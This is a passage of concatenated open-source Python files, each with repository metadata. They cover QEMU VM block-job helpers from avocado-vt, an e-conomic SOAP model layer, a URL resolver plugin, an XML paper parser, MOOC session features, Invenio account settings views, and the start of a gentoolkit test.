"Device %s not listed in monitor's output" % value
if isinstance(blocks_info, str):
lock_str = "locked=1"
lock_str_new = "locked"
no_lock_str = "not locked"
for block in blocks_info.splitlines():
if (value in block) and (lock_str in block):
return True
# deal with new qemu
block_list = self.process_info_block(blocks_info)
for block_new in block_list:
if (value in block_new) and ("Removable device" in block_new):
if no_lock_str in block_new:
return False
elif lock_str_new in block_new:
return True
else:
for block in blocks_info:
if value in str(block):
return block['locked']
return False
def live_snapshot(self, base_file, snapshot_file,
snapshot_format="qcow2"):
"""
Take a live disk snapshot.
:param base_file: base file name
:param snapshot_file: snapshot file name
:param snapshot_format: snapshot file format
:return: File name of disk snapshot.
"""
device = self.get_block({"file": base_file})
output = self.monitor.live_snapshot(device, snapshot_file,
format=snapshot_format)
logging.debug(output)
device = self.get_block({"file": snapshot_file})
if device:
current_file = device
else:
current_file = None
return current_file
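    # Example (editor's sketch; file names hypothetical): snapshot the drive
    # backed by base.qcow2 into sn1.qcow2 and confirm the device switched:
    #
    #     current = vm.live_snapshot("base.qcow2", "sn1.qcow2")
    #     assert current is not None, "snapshot device not found"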
def block_stream(self, device, speed, base=None, correct=True):
"""
        Start streaming a block device, i.e. merge the backing chain into
        the active image;
:param device: device ID;
:param speed: limited speed, default unit B/s;
:param base: base file;
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_stream_cmd", "block-stream")
return self.monitor.block_stream(device, speed, base,
cmd, correct=correct)
def block_mirror(self, device, target, sync,
correct=True, **kwargs):
"""
Mirror block device to target file;
:param device: device ID
:param target: destination image file name;
:param sync: what parts of the disk image should be copied to the
destination;
:param correct: auto correct cmd, correct by default
:param kwargs: optional keyword arguments including but not limited to below
:keyword Args:
format (str): format of target image file
mode (str): target image create mode, 'absolute-paths' or 'existing'
speed (int): maximum speed of the streaming job, in bytes per second
replaces (str): the block driver node name to replace when finished
granularity (int): granularity of the dirty bitmap, in bytes
buf_size (int): maximum amount of data in flight from source to target, in bytes
on-source-error (str): the action to take on an error on the source
on-target-error (str): the action to take on an error on the target
"""
cmd = self.params.get("block_mirror_cmd", "drive-mirror")
return self.monitor.block_mirror(device, target, sync, cmd,
correct=correct, **kwargs)
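    # Example (hedged; device ID and target path are assumptions): mirror a
    # whole drive to a new file, capped at roughly 10 MiB/s:
    #
    #     vm.block_mirror("drive-virtio-disk0", "/tmp/mirror.qcow2", "full",
    #                     speed=10 * 1024 * 1024, format="qcow2",
    #                     mode="absolute-paths")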
def block_reopen(self, device, new_image, format="qcow2", correct=True):
"""
        Reopen a new image; this step is not needed on a RHEL 7 host
:param device: device ID
:param new_image: new image filename
:param format: new image format
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_reopen_cmd", "block-job-complete")
return self.monitor.block_reopen(device, new_image,
format, cmd, correct=correct)
def cancel_block_job(self, device, correct=True):
"""
        Cancel the active block job on the image file
:param device: device ID
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_job_cancel_cmd", "block-job-cancel")
return self.monitor.cancel_block_job(device, cmd, correct=correct)
def pause_block_job(self, device, correct=True):
"""
Pause an active block streaming operation.
:param device: device ID
:param correct: auto correct command, correct by default
:return: The command's output
"""
cmd = self.params.get("block_job_pause_cmd", "block-job-pause")
return self.monitor.pause_block_job(device, cmd, correct=correct)
def resume_block_job(self, device, correct=True):
"""
Resume a paused block streaming operation.
:param device: device ID
:param correct: auto correct command, correct by default
:return: The command's output
"""
cmd = self.params.get("block_job_resume_cmd", "block-job-resume")
return self.monitor.resume_block_job(device, cmd, correct=correct)
def set_job_speed(self, device, speed="0", correct=True):
"""
set max speed of block job;
:param device: device ID
:param speed: max speed of block job
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("set_block_job_speed", "block-job-set-speed")
return self.monitor.set_block_job_speed(device, speed,
cmd, correct=correct)
def get_job_status(self, device):
"""
get block job info;
:param device: device ID
"""
return self.monitor.query_block_job(device)
def eject_cdrom(self, device, force=False):
"""
        Eject the CD-ROM media and open the drive tray;
:param device: device ID;
:param force: force eject or not;
"""
return self.monitor.eject_cdrom(device, force)
def change_media(self, device, target):
"""
Change media of cdrom;
:param device: Device ID;
:param target: new media file;
"""
return self.monitor.change_media(device, target)
def balloon(self, size):
"""
        Balloon the VM memory to the given size.
        :param size: memory size, either an int in megabytes or a string
                     with an explicit unit (e.g. "1024 MB")
"""
if isinstance(size, int):
size = "%s MB" % size
normalize_data_size = utils_misc.normalize_data_size
size = int(float(normalize_data_size(size, 'B', '1024')))
return self.monitor.balloon(size)
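    # Example (illustrative): the two calls below request the same 1 GiB
    # target; an int is taken as megabytes, a string may carry its own unit:
    #
    #     vm.balloon(1024)
    #     vm.balloon("1024 MB")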
def system_reset(self):
""" Send system_reset to monitor"""
return self.monitor.system_reset()
|
will-Do/avocado-vt
|
virttest/qemu_vm.py
|
Python
|
gpl-2.0
| 189,844
|
"""
Model Abstraction of e-economic.com API
"""
import copy
import re
import os
import base64
from collections import defaultdict
from suds.client import Client
class ObjectDoesNotExist(BaseException):
pass
class MultipleObjectsReturned(BaseException):
pass
class EConomicsService(object):
"""
Interface for e-conomic WSDL service
"""
def __init__(self, service, model_factory, soap_factory, codec):
self.service = service
self.model_factory = model_factory
self.soap_factory = soap_factory
self.ncalls = 0
self.codec = codec
def fetch_list(self, name, expected_wsdltype, *args, **kw):
result = getattr(self.service, name)(*args)
self.ncalls += 1
if not result:
return []
if expected_wsdltype and expected_wsdltype not in result.__keylist__:
return [result]
return result[0]
def fetch(self, name, *args, **kw):
return getattr(self.service, name)(*args)
def upgrade_to_order(self, handle, order_model):
hnd = self.fetch('Quotation_UpgradeToOrder', handle)
return self.model_factory.get_or_create_instance(self, order_model, hnd)
def upgrade_to_invoice(self, handle, current_invoice_model):
hnd = self.fetch('Order_UpgradeToInvoice', handle)
return self.model_factory.get_or_create_instance(self, current_invoice_model, hnd)
def book_invoice(self, handle, invoice_model):
hnd = self.fetch('CurrentInvoice_Book', handle)
return self.model_factory.get_or_create_instance(self, invoice_model, hnd)
def next_available_number(self, model):
return self.fetch('%s_GetNextAvailableNumber' % model.__name__)
def delete(self, model, handle):
self.fetch("%s_Delete" % model.__name__, handle)
def create(self, model, **data):
parsed_data = self.codec.encode_data_object(self, model, data)
hnd = self.fetch("%s_CreateFromData" % model.__name__, parsed_data)
return self.get_instance(model, hnd)
def get_or_create(self, model, **spec):
filter_names = [f['name'] for f in model.__filters__]
get_data = dict((k, v,) for k, v in spec.items() if k in filter_names)
try:
return self.get(model, **get_data)
except ObjectDoesNotExist:
return self.create(model, **spec)
def __find_handles(self, model, **spec):
""" find model instances based on given filter (spec)
The filter is based on available server-calls, so some values might not be available for filtering.
        Multiple filter values result in multiple server calls.
        For complex filters on small datasets, it might be faster to fetch everything and filter in memory.
        An empty filter fetches all instances.
:param model: subclass of EConomicsModel
:param spec: mapping of values to filter by
:return: a list of EConomicsModel instances
"""
server_calls = []
filter_names = dict([(f['name'], f['method'],) for f in model.get_filters()])
if not spec:
server_calls.append({'method': "%s_GetAll" % model.__name__, 'args': []})
else:
for key, value in spec.items():
                if key not in filter_names:
raise ValueError("no server-method exists for filtering by '%s'" % key)
args = []
if not hasattr(value, '__iter__'):
value = [value]
if key.endswith('_list'):
vtype = type(value[0]).__name__
# TODO: this surely does not cover all cases of data types
array = self.soap_factory.create('ArrayOf%s' % vtype.capitalize())
getattr(array, "%s" % vtype).extend(value)
args.append(array)
else:
args.extend(value)
method = "%s_%s" % (model.__name__, filter_names[key])
if filter_names[key].startswith('GetAll'):
args = []
server_calls.append({'method': method, 'args': args, 'expect': "%sHandle" % model.__name__})
handles = [
map(Handle, self.fetch_list(scall['method'], scall.get('expect'), *scall['args']))
for scall in server_calls
]
return [h.wsdl for h in reduce(set.intersection, map(set, handles))]
def find(self, model, **spec):
handles = self.__find_handles(model, **spec)
return [self.get_instance(model, hnd) for hnd in handles]
def get(self, model, **spec):
"""get a single model instance by handle
:param model: model
:param handle: instance handle
:return:
"""
handles = self.__find_handles(model, **spec)
if len(handles) > 1:
raise MultipleObjectsReturned()
if not handles:
raise ObjectDoesNotExist()
return self.get_instance(model, handles[0])
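    # Usage sketch (editor's note; the model and filter names below are
    # assumptions based on the naming conventions in build_model_code):
    #
    #     debtor = service.get(Debtor, number=101)
    #     debtors = service.find(Debtor)  # an empty filter fetches everything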
def get_instance(self, model, handle):
return self.model_factory.get_or_create_instance(self, model, handle)
def load_instance_data(self, instance):
model = instance.__class__
modelname = model.__name__
data = self.fetch("%s_GetData" % modelname, instance._handle)
instance._data = self.codec.decode_data_object(self, instance._handle, model, data)
def load_data(self, instance):
model = instance.__class__
modelname = model.__name__
handles = [inst._handle for (m, inst,) in self.model_factory.instances_iter([model], loaded=False)]
array = self.soap_factory.create('ArrayOf%sHandle' % modelname)
getattr(array, "%sHandle" % modelname).extend(handles)
for data in self.fetch_list("%s_GetDataArray" % modelname, None, array):
handle = data.Handle
inst = self.get_instance(model, handle)
inst._data = self.codec.decode_data_object(self, handle, model, data)
inst._loaded = True
def get_all_changes(self):
changesets = defaultdict(list)
for model, inst in self.model_factory.instances_iter(updated=True):
changesets[model].append(ModelChange(model, inst))
return changesets
def commit(self):
changesets = self.get_all_changes()
for model, changes in changesets.items():
datalist = [self.codec.encode_data_object(self, model, changeset.get_data()) for changeset in changes]
array = self.soap_factory.create('ArrayOf%sData' % model.__name__)
getattr(array, '%sData' % model.__name__).extend(datalist)
self.fetch("%s_UpdateFromDataArray" % model.__name__, array)
[change.apply_and_clear() for change in changes]
def __getattr__(self, name):
return getattr(self.service, name)
class ModelChange(object):
def __init__(self, model, instance):
self.model = model
self.instance = instance
def __repr__(self):
return "<Changes %r %r>" % (self.instance, self.clean_data(self.instance._changes))
def apply_and_clear(self):
self.instance._data.update(self.instance._changes)
self.instance._changes = {}
def clean_data(self, data):
result = {}
for k, v in data.items():
k = pythonize(k)
if k.endswith('_handle'):
k = k[:-7]
result[k] = v
return result
def get_data(self):
if not self.instance._data:
self.instance.fetch()
data = self.clean_data(self.instance._data)
data.update(self.clean_data(self.instance._changes))
data['Handle'] = self.instance._handle
return data
class PropertyCodec(object):
def __init__(self, missing_value=None):
self.missing_value = missing_value
def decode_data_object(self, service, handle, model, data):
decoded_data = {}
for prop in model.properties:
name = prop.name
if prop.name+'Handle' in data:
name = prop.name + 'Handle'
            if name not in data:
value = prop.default_value(service, handle)
else:
value = prop.decode_value(service, handle, data[name])
decoded_data[prop.name] = value
return decoded_data
def encode_data_object(self, service, model, data):
#print 'ENCODE', data
encoded_data = {}
if 'Handle' in data:
encoded_data['Handle'] = data['Handle']
for prop in model.properties:
name = prop.pyname
            if name not in data:
# encoded_data[prop.name] = self.missing_value
continue
value = data[name]
if value is None:
# encoded_data[prop.name] = value
continue
encoded_data[prop.name] = prop.encode_value(service, data[name])
return encoded_data
class EConomicsModelFactory(object):
def __init__(self):
self.__models = {}
def instances_iter(self, models=None, loaded=None, updated=None):
if models is None:
models = self.__models.keys()
for model in models:
for inst in self.__models[model].values():
if loaded is not None and bool(inst._loaded) != bool(loaded):
continue
if updated is not None and bool(inst._changes) != bool(updated):
continue
yield (model, inst,)
def get_or_create_instance(self, service, model, handle):
hashkey = hash((service, model, handle[0],))
modeldata = self.__models.setdefault(model, {})
return modeldata.setdefault(hashkey, model(service, handle))
class Handle(object):
def __init__(self, wsdl):
self.wsdl = wsdl
def __hash__(self):
return hash(self.wsdl[0])
def __eq__(self, other):
        return hash(self) == hash(other)
def __repr__(self):
return "<Handle %r>" % self.wsdl.Id
class EConomicsMeta(type):
registry = {}
def __new__(mcs, name, bases, ns):
properties = []
for k, v in ns.items():
if hasattr(v, '__get__'):
properties.append(v)
ns['properties'] = properties
model = type.__new__(mcs, name, bases, ns)
mcs.registry[name] = model
return model
def get_filters(self):
return self.__filters__
class EConomicsBaseProperty(object):
def encode_value(self, service, value):
return value
def decode_value(self, service, handle, value):
return value
def default_value(self, service, handle):
return None
def __get__(self, instance, owner):
_ = owner
if instance is None:
return self
changes = instance._changes
if self.name in changes:
return changes[self.name]
if not instance._loaded:
instance.load()
value = instance._data[self.name]
if hasattr(value, 'fetched') and not value.fetched:
value.fetch()
return value
def __set__(self, instance, value):
instance._changes[self.name] = value
class EConomicsProperty(EConomicsBaseProperty):
def __init__(self, name):
self.name = name
self.pyname = pythonize(name)
def __repr__(self):
return "<%s Data>" % pythonize(self.name)
class EConomicsReference(EConomicsBaseProperty):
def __init__(self, name, model):
self.name = name + 'Handle'
self.model = model
self.pyname = pythonize(name)
def encode_value(self, service, value):
return value._handle
def decode_value(self, service, handle, value):
return service.get_instance(get_model(self.model), value)
def __repr__(self):
return "<%s %s>" % (self.name, self.model)
class QueryList(list):
def __init__(self, service, handle, model, method):
self.service = service
self.handle = handle
self.model = model
self.method = method
self.fetched = False
def __getattribute__(self, name):
if name in ['fetch', 'service', 'handle', 'model', 'method', 'fetched']:
return list.__getattribute__(self, name)
        if not self.fetched:
            self.fetch()
return list.__getattribute__(self, name)
def fetch(self):
handles = self.service.fetch_list(self.method, None, self.handle)
self[:] = [self.service.get_instance(self.model, hnd) for hnd in handles]
self.fetched = True
return self
class EConomicsReferenceList(EConomicsBaseProperty):
def __init__(self, name, model, method):
self.name = name
self.model = model
self.method = method
self.pyname = pythonize(name)
def __repr__(self):
return "<%s [%s]>" % (self.name, self.model)
def encode_value(self, service, value):
return [v._handle for v in value]
def default_value(self, service, handle):
return QueryList(service, handle, get_model(self.model), self.method)
class EConomicsFileProperty(EConomicsBaseProperty):
def __init__(self, name, method, filetype):
self.name = name
self.filetype = filetype
self.method = method
self.pyname = pythonize(name)
def __repr__(self):
return "<%s %s file>" % (self.name, self.filetype)
def default_value(self, service, handle):
return FileObject(service, self.method, handle, self.filetype)
class FileObject(object):
def __init__(self, service, method, handle, filetype):
self.filedata = None
self.method = method
self.service = service
self.handle = handle
self.filetype = filetype
self.fetched = False
self.__last_location = None
def fetch(self):
self.filedata = self.service.fetch(self.method, self.handle)
self.fetched = True
return self
def save(self, location):
if not location.endswith(self.filetype):
location += '.' + self.filetype
with open(location, 'wb') as f:
f.write(base64.b64decode(self.filedata))
self.__last_location = location
def show(self):
if not self.__last_location:
self.save('/tmp/economic_tmp')
os.system('xdg-open %s' % self.__last_location)
class EConomicsModel(object):
__filters__ = []
__metaclass__ = EConomicsMeta
def __init__(self, service, handle):
self._handle = handle
self._loaded = False
self._service = service
self._data = {}
self._changes = {}
def __repr__(self):
return "<%s %s>" % (self.__class__.__name__, self._handle[0])
def fetch(self):
self._service.load_instance_data(self)
return self
def update(self, **data):
for k, v in data.items():
setattr(self, k, v)
def load(self):
self._service.load_data(self)
def delete(self):
self._service.delete(self.__class__, self._handle)
def get_model(name):
return EConomicsMeta.registry[name]
def pythonize(name):
return re.sub('([A-Z])([a-z])', r'_\1\2', name).strip('_').lower()
def camelcase(name):
return ''.join(map(str.capitalize, name.split('_')))
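# Quick illustration of the two name converters above (editor's note):
#
#     pythonize('OurReferenceHandle')  # -> 'our_reference_handle'
#     camelcase('our_reference')       # -> 'OurReference'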
def build_model_code(client):
"""
Generate source code for e-conomic models based on WSDL connection.
This is based on the assumption that the API follows a specific method naming-convention.
    Not all models and attributes have been tested.
The source-generation is mostly to help improve readability and IDE auto-completion.
:param client:
:return: source code for models.py
"""
models = {}
references = {}
for method in client.wsdl.services[0].ports[0].methods.values():
        if '_' not in method.name:
continue
model, action = method.name.split('_')
models.setdefault(model, {'properties': [], 'filters': []})
references[model] = model
if model[-1] == 'y':
references[model[:-1] + 'ies'] = model
else:
references[model+'s'] = model
references['OurReference'] = 'Employee'
references['GetYourReference'] = 'DebtorContact'
references['GetAttention'] = 'DebtorContact'
references['Layout'] = 'TemplateCollection'
special = {
'Order_GetPdf': {
'type': 'EConomicsFileProperty',
'args': ["'Order_GetPdf'", "'pdf'"]
},
'Invoice_GetPdf': {
'type': 'EConomicsFileProperty',
'args': ["'Invoice_GetPdf'", "'pdf'"]
},
'CurrentInvoice_GetPdf': {
'type': 'EConomicsFileProperty',
'args': ["'CurrentInvoice_GetPdf'", "'pdf'"]
}
}
for line in ['Order', 'Invoice', 'CurrentInvoice', 'Quotation']:
method = '%s_GetLines' % line
special[method] = {
'type': 'EConomicsReferenceList',
'args': ["'%sLine'" % line, "'%s'" % method]
}
for method in client.wsdl.services[0].ports[0].methods.values():
        if '_' not in method.name:
continue
model, action = method.name.split('_')
if action in ['GetData', 'GetAll', 'GetDataArray']:
continue
modeldata = models[model]
if action == 'GetAllUpdated':
camelname = action[3:]
modeldata['filters'].append({'name': pythonize(camelname), 'method': action})
if re.findall('GetAll[A-Z].+', action):
camelname = action[3:]
modeldata['filters'].append({'name': pythonize(camelname), 'method': action})
elif action.startswith('FindBy'):
camelname = action[6:]
modeldata['filters'].append({'name': pythonize(camelname), 'method': action})
elif action.startswith('Get'):
propname = action[3:]
pyname = pythonize(propname)
if not propname:
continue
get_type = re.findall('Get(%s)[a-z0-9]*?$' % ('|'.join(references.keys())), action)
if get_type and get_type[0] in references:
refmodel = references[get_type[0]]
if action[-1] == 's':
modeldata['properties'].append({
'type': 'EConomicsReferenceList',
'args': ["'%s'" % propname, "'%s'" % refmodel, "'%s'" % method.name],
'name': pyname
})
else:
modeldata['properties'].append({
'type': 'EConomicsReference',
'args': ["'%s'" % propname, "'%s'" % refmodel],
'name': pyname
})
elif method.name in special:
spdata = special[method.name]
modeldata['properties'].append({
'type': spdata['type'],
'args': ["'%s'" % propname] + spdata['args'],
'name': pyname
})
else:
modeldata['properties'].append({
'type': 'EConomicsProperty',
'args': ["'%s'" % propname],
'name': pyname
})
classes = []
for modelname, modeldata in models.items():
propertycode = ["%s = %s(%s)" % (md['name'], md['type'], ', '.join(md['args']))
for md in modeldata['properties']]
code = "class %s(%s):\n __filters__ = %r\n %s" % (modelname, 'EConomicsModel',
modeldata['filters'], '\n '.join(propertycode))
classes.append(code)
return "from pyconomic.base import *\n\n\n" + "\n\n\n".join(classes)
|
mikkeljans/pyconomic
|
pyconomic/base.py
|
Python
|
gpl-2.0
| 19,899
|
'''
Plugin for URLResolver
Copyright (C) 2016 Gujal
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from urlresolver.plugins.__generic_resolver__ import GenericResolver
class PutLoadResolver(GenericResolver):
name = "putload.tv"
domains = ["putload.tv", "shitmovie.com"]
pattern = r'(?://|\.)(putload\.tv|shitmovie\.com)/(?:embed-)?([0-9a-zA-Z]+)'
|
dknlght/dkodi
|
src/script.module.urlresolver/lib/urlresolver/plugins/putload.py
|
Python
|
gpl-2.0
| 979
|
from bs4 import BeautifulSoup
html_doc = open('../Dataset/CVPR 2011/5995308_full_text.xml', 'rb')
soup = BeautifulSoup(html_doc, 'html.parser')
# print(soup.prettify())
# print soup.title
# print soup.title.string
## extract article
article = soup.find(id = 'article')
## extract all sections
sections_list = []
for sec in article.find_all('div', class_ = 'section'):
sections_list.append(sec)
print sections_list[0]
## extract section title and content
for sec in sections_list:
kicker = sec.find(class_ = 'kicker').string
title = sec.h2.text
print title
# title = ''
# for sub_title in sec.h2.contents:
# title += sub_title.string
# # remove all a tags from section
# for a in sec.find_all('a'):
# a.decompose()
content = ''
for paragraph in sec.find_all('p'):
content += paragraph.text
print content
# if sec == sections_list[len(sections_list) - 1]:
# # extract acknowledgement
# if sec.next_sibling:
# acknowledgement = sec.next_sibling.string
# print acknowledgement
## extract related articles
related_articles = soup.find(id = 'related-articles')
## extract article information
article_information = soup.find(id = 'left-panel')
## extract article information
article_data = soup.find(id = 'article-data')
# footnotes
# foot_notes_tag = article_data.find(id = 'footnotes')
# if foot_notes_tag is not None:
# foot_notes = []
# for foot_note in foot_notes_tag.find_all('p'):
# foot_notes.append(foot_note.text)
# print foot_notes
# references
# references_tag = article_data.find(id = 'references')
# if references_tag is not None:
# references = []
# for reference in references_tag.find_all(class_ = 'ref'):
# references.append(reference.select_one('.body').text)
# for refrence in references:
# print refrence
# authors
# authors_tag = article_data.find(id = 'authors')
# if authors_tag is not None:
# authors = []
# for author in authors_tag.find_all(class_ = 'author'):
# author_image = author.find('img')['src']
# author_link = author.find('a')['href']
# author_bio = author.select_one('.bio').text
# authors.append({'image' : author_image,
# 'link' : author_link,
# 'bio' : author_bio
# })
# # print authors
#
# # citedby
# citedby_tag = article_data.find(id = 'citedby')
# if citedby_tag is not None:
# citedby = []
# for cityby_i in citedby_tag.find_all(class_ = 'ref ieee'):
# pass
#
# # keywords
# keywords_tag = article_data.find(id = 'keywords')
# if keywords_tag is not None:
# keywords = []
# for keywords_i in keywords_tag.find_all(class_ = 'block'):
# keyword_type = keywords_i.h3.text
# print keyword_type
# _keywords = []
# for keyword_link in keywords_i.find_all('a'):
# _keywords.append(keyword_link.text)
# keywords.append({keyword_type: _keywords})
# print keywords
# else:
# print None
# for para in soup.find(id='sec1').find_all('p'):
# para.a.extract()
# for para in soup.find(id='sec1').find_all('p'):
# print para
|
lidalei/IR-Project
|
src/CrawlDataset/Xml_Parse.py
|
Python
|
gpl-2.0
| 3,258
|
#! /usr/local/bin/python3
# -*- utf-8 -*-
"""
Total: 45
0: number of 3-hour defined sessions in the enrollment
1~4: average, standard deviation, maximal, minimal numbers of events in
3-hour defined sessions in the enrollment
5~8: statistics of 3-hour defined sessions: mean, std, max, min of duration
9: number of 1-hour defined sessions in the enrollment
10~13: average, standard deviation, maximal, minimal numbers of events in
1-hour defined sessions in the enrollment
14~17: statistics of 1-hour defined sessions: mean, std, max, min of duration
18: number of 12-hour defined sessions in the enrollment
19~22: average, standard deviation, maximal, minimal numbers of events in
12-hour defined sessions in the enrollment
23~26: statistics of 12-hour defined sessions: mean, std, max, min of duration
27: number of 1-day defined sessions in the enrollment
28~31: average, standard deviation, maximal, minimal numbers of events in
1-day defined sessions in the enrollment
32~35: statistics of 1-day defined sessions: mean, std, max, min of duration
36: number of 7-day defined sessions in the enrollment
37~40: average, standard deviation, maximal, minimal numbers of events in
7-day defined sessions in the enrollment
41~44: statistics of 7-day defined sessions: mean, std, max, min of duration
"""
import logging
import sys
import os
from datetime import timedelta
import multiprocessing as par
import numpy as np
import pandas as pd
import IO
import Path
import Util
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG,
format='%(asctime)s %(name)s %(levelname)s\t%(message)s')
logger = logging.getLogger(os.path.basename(__file__))
def __get_features__(param):
log_all, dt = param
logger.debug('getting features of timedelta(%s)', dt)
X = sessions_of(log_all, dt)
logger.debug('got features of timedelta(%s)', dt)
return dt, X
def extract(base_date):
pkl_path = Path.of_cache('sessions.%s.pkl' % base_date)
X = IO.fetch_cache(pkl_path)
if X is not None:
logger.debug('cache hit')
return X
logger.debug('cache missed')
logger.debug('prepare datasets ...')
enroll_all = IO.load_enrollments()
log_all = IO.load_logs()
log_all = log_all[log_all['time'] <= base_date]
logger.debug('datasets prepared')
check_dataframe = Util.dataframe_checker(logger)
n_proc = par.cpu_count()
params = [(log_all, dt)
for dt in [timedelta(hours=3), timedelta(hours=1),
timedelta(hours=12), timedelta(days=1),
timedelta(days=7)]]
log_problem = log_all[log_all['event'] == 'problem']
params += [(log_problem, dt)
for dt in [timedelta(hours=3), timedelta(hours=1)]]
pool = par.Pool(processes=min(n_proc, len(params)))
X = enroll_all
for dt, X_ in pool.map(__get_features__, params):
check_dataframe(X_, str(dt))
X = pd.merge(X, X_, how='left', on='enrollment_id')
pool.close()
pool.join()
del X['username']
del X['course_id']
X.fillna(0, inplace=True)
check_dataframe(X, 'X')
IO.cache(X, pkl_path)
return X
def sessions_of(log_all, delta_t):
def __session__(group):
group_t = group['time'].sort(inplace=False).reset_index(drop=True)
dt = (group_t[1:].reset_index() - group_t[:-1].reset_index())['time']
session_break = dt > delta_t
breaks_indices = session_break[session_break].index.values
sessions_indices = []
i = 0
for b in breaks_indices:
if b < i:
i += 1
else:
sessions_indices.append((i, b))
i = b + 1
if i < len(group_t):
sessions_indices.append((i, len(group_t) - 1))
feature = [len(sessions_indices)]
indices = ['count']
nums_of_events = [j - i + 1 for i, j in sessions_indices]
feature += [f(nums_of_events)
for f in [np.average, np.std, np.max, np.min]]
indices += ['ec_' + i for i in ['mean', 'std', 'max', 'min']]
sessions = pd.DataFrame(
[(group_t[i], group_t[j]) for i, j in sessions_indices],
columns=['st', 'et'])
duration_ratio = (sessions['et'] - sessions['st']) / delta_t
feature += [f(duration_ratio) for
f in [np.average, np.std, np.max, np.min]]
indices += ['dr_' + i for i in ['mean', 'std', 'max', 'min']]
return pd.Series(feature, index=indices)
return log_all.groupby('enrollment_id').apply(__session__).reset_index()
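# Worked example of the session-splitting rule above (editor's sketch): with
# delta_t = 1 hour and sorted event times [09:00, 09:20, 11:00, 11:10], only
# the 09:20 -> 11:00 gap exceeds delta_t, so two sessions result, each with
# 2 events: (09:00, 09:20) and (11:00, 11:10).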
|
Divergent914/yakddcup2015
|
sessions.py
|
Python
|
gpl-2.0
| 4,628
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
import random
list_names = ["ivan","foo","bar","mary","peter"]
random.shuffle(list_names)
print 'You are the winner: < %s >' % (random.choice(list_names))
|
iv4nelson/apps_tigd
|
sorted_random.py
|
Python
|
gpl-2.0
| 203
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""GitHub Settings Blueprint."""
from __future__ import absolute_import
from flask import Blueprint, render_template, redirect, url_for, request, \
flash, g
from flask_login import login_required, current_user
from flask_breadcrumbs import register_breadcrumb
from flask_menu import register_menu, current_menu
from invenio.base.i18n import _
from invenio.ext.sslify import ssl_required
from invenio.ext.login import reset_password
from ..forms import ChangePasswordForm, LostPasswordForm, ProfileForm, \
VerificationForm
from ..models import User
blueprint = Blueprint(
'accounts_settings',
__name__,
url_prefix="/account/settings",
static_folder="../static",
template_folder="../templates",
)
@blueprint.before_app_first_request
def register_menu_items():
"""Register empty account breadcrumb."""
item = current_menu.submenu('breadcrumbs.settings')
item.register('', _('Account'))
@blueprint.route("/")
@ssl_required
@login_required
def index():
"""Index page."""
return redirect(url_for(".profile"))
@blueprint.route("/profile", methods=['GET', 'POST'])
@ssl_required
@login_required
@register_menu(
blueprint, 'settings.profile',
_('%(icon)s Profile', icon='<i class="fa fa-user fa-fw"></i>'),
order=0,
active_when=lambda: request.endpoint.startswith("accounts_settings.")
)
@register_breadcrumb(blueprint, 'breadcrumbs.settings.profile', _('Profile'))
def profile():
"""Change password form for authenticated users."""
u = User.query.filter_by(id=current_user.get_id()).first()
profile_form = ProfileForm(formdata=None, obj=u, prefix="profile")
verification_form = VerificationForm(formdata=None, prefix="verification")
password_form = ChangePasswordForm(formdata=None, prefix="password")
form = request.form.get('submit', None)
if form == 'password':
password_form.process(formdata=request.form)
if password_form.validate_on_submit():
u.password = password_form.data['password']
flash(_("Password changed."), category="success")
elif form == 'profile':
profile_form.process(formdata=request.form)
if profile_form.validate_on_submit():
changed_attrs = u.update_profile(profile_form.data)
if 'email' in changed_attrs:
flash(_("Profile updated. We have sent a verification email to"
" %(email)s. Please check it.", email=u.email),
category="success")
elif changed_attrs:
flash(_("Profile updated."), category="success")
else:
flash(_("No changes to profile."), category="success")
elif form == 'verification':
verification_form.process(formdata=request.form)
if verification_form.validate_on_submit():
if u.verify_email():
flash(_("Verification email sent."), category="success")
return render_template(
"accounts/settings/profile.html",
password_form=password_form,
profile_form=profile_form,
verification_form=verification_form,
user=u,
)
@blueprint.route("/profile/lost", methods=['GET', 'POST'])
@ssl_required
@login_required
@register_breadcrumb(
blueprint, 'breadcrumbs.settings.profile.lost', _('Lost password')
)
def lost():
"""Lost password form for authenticated users."""
form = LostPasswordForm(request.form)
if form.validate_on_submit():
if reset_password(form.data['email'], g.ln):
flash(_('A password reset link has been sent to %(whom)s',
whom=request.values['email']), 'success')
return redirect(url_for('.profile'))
return render_template(
"accounts/settings/lost.html",
form=form,
)
|
zenodo/invenio
|
invenio/modules/accounts/views/settings.py
|
Python
|
gpl-2.0
| 4,581
|
#!/usr/bin/python
#
# Copyright(c) 2009, Gentoo Foundation
#
# Licensed under the GNU General Public License, v2
#
# $Header$
import unittest
from gentoolkit.cpv import CPV, compare_strs
from gentoolkit.test import cmp
class TestGentoolkitCPV(unittest.TestCase):
def assertEqual2(self, o1, o2):
# logic bugs hidden behind short circuiting comparisons for metadata
# is why we test the comparison *both* ways.
self.assertEqual(o1, o2)
c = cmp(o1, o2)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r, aren't equal: got %i" % (o1, o2, c))
self.assertEqual(o2, o1)
c = cmp(o2, o1)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r,aren't equal: got %i" % (o2, o1, c))
def assertNotEqual2(self, o1, o2):
        # logic bugs hidden behind short circuiting comparisons for metadata
        # is why we test the comparison *both* ways.
self.assertNotEqual(o1, o2)
c = cmp(o1, o2)
self.assertNotEqual(c, 0,
